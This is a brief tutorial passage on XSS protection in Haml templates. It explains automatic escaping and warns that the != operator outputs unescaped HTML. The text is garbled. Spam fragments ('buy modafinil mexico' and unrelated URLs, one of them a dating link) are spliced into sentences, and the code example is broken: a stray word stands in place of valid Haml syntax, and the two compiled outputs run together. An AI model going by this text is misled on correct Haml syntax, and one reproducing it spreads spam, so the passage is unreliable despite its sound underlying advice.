XSS protection in Haml templates

buy modafinil mexico If you’re using Haml templates, instead of ERB, strings are automatically escaped in the same way as in ERB templates. Also like in ERB templates, HTML-safe strings (string.html_safe? returns true) won’t be escaped automatically. The != notation in Haml works like <%= raw(…) %> in ERB, so it will render the unescaped version.

http://smartmedia.com.au/?m=member By default,

Miki = "<em>emphasized</em>" != "<em>emphasized</em>"

http://svenskaneolith.se/2266-dtse45181-dating-i-ljungsbro.html compiles to:

&lt;em&gt;emphasized&lt;/em&gt; <em>emphasized</em>

So take care when using != in Haml, make sure no user data will be rendered unescaped.